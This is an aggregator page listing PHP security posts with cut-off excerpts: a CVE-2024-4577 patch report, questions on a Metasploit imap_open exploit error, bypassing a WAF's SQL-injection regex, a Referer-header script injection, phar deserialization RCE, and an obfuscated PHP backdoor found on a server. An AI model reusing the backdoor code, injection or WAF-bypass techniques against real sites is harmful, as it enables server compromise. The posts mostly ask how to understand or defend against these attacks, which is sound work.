PHP – Page 3 – WindowsTechs.com

PHP Patches Critical Remote Code Execution Vulnerability

Posted on June 10, 2024 by Ionut Arghire

PHP has released patches for CVE-2024-4577, a critical vulnerability that could lead to arbitrary code execution on remote servers.
The post PHP Patches Critical Remote Code Execution Vulnerability appeared first on SecurityWeek.
Continue reading PHP Patches Critical Remote Code Execution Vulnerability→

Log core: Interactive#tunnel_local error – IOError closed stream

Posted on May 20, 2024 by Jonas

This error appears when trying to run the exploit linux/http/php_imap_open_rce payload: cmd/unix/pingback_bind
creates the session, but it dates and this error appears

Continue reading Log core: Interactive#tunnel_local error – IOError closed stream→

Securely store password for API sessions

Posted on May 16, 2024 by Techlands

Scenario:
I have a PHP web application that needs to make an API call using a password provided by the user. I want to temporarily store this password so I can use it across multiple requests without having to re-ask the user for the passw… Continue reading Securely store password for API sessions→

PHP JWT token flow in Symfony

Posted on May 14, 2024 by PVit

I am working on an app with separate front-end and backend. I need to create API routes which are protected by a JWT token.
On login/register the user gets back a JWT token(short lived) and refresh token(long lived). Refresh token is store… Continue reading PHP JWT token flow in Symfony→

Backdoor:PHP/Webshell.O virus detected in an uploaded image file. Should I be worried? How can I prevent it?

Posted on May 8, 2024 by cantsay

I have a site which allows users to upload images. One uploaded file was recently detected by antivirus software (uploads aren’t scanned, this was a system wide scan after)
Upon upload, I check the file extension, the MIME type and also us… Continue reading Backdoor:PHP/Webshell.O virus detected in an uploaded image file. Should I be worried? How can I prevent it?→

Problem bypassing a PHP WAF for SQLi

Posted on April 15, 2024 by Dinnerboard

I am working to bypass this WAF, but I have some problems.
$args_arr=array(

‘sql’=>"[^\\{\\s]{1}(\\s|\\b)+(?:select\\b|update\\b|insert(?:(\\/\\*.*?\\*\\/)|(\\s)|(\\+))+into\\b).+?(?:from\\b|set\\b)|[^\\{\\s]{1}(\\s|\\… Continue reading Problem bypassing a PHP WAF for SQLi→

Is PHP Declining In Popularity?

Posted on April 14, 2024 by EditorDavid

The PHP programming language has sunk to its lowest position ever on the long-running TIOBE index of programming language popularity. It now ranks #17 — lower than Assembly Language, Ruby, Swift, Scratch, and MATLAB. InfoWorld reports:

When the… Continue reading Is PHP Declining In Popularity?→

How to sanitize $_SERVER url variables?

Posted on April 8, 2024 by rami300

An attacker used the HTTP_REFERER variable to inject Javascript by sending the following in the Header:
Referer:
javascript:alert(document.c… Continue reading How to sanitize $_SERVER url variables?→

Phar file deserialization in PHP < 8.0

Posted on April 8, 2024 by OrenIshShalom

TLDR:

I want to reproduce the RCE from phar file deserialization described in GitHub/advisory/97m3.
I fabricate an html file that includes a malicious svg file in its <img> tag.
Adding debug prints, I make sure I hit file_exists wit… Continue reading Phar file deserialization in PHP < 8.0→

How dangerous is this suspicious PHP code? [closed]

Posted on March 15, 2024 by mwfearnley

I found this code on my web server in /wp-content/uploads/2023/index.php:
$hello_dolly[]=’b8f878fc41d0fd3c’;
$hello_dolly[]=$_POST;
$hello_dolly[]=’color’;
if (isset($hello_dolly[1][$hello_dolly[0]])) {
$dolly = $hello_dolly[1][$hello_… Continue reading How dangerous is this suspicious PHP code? [closed]→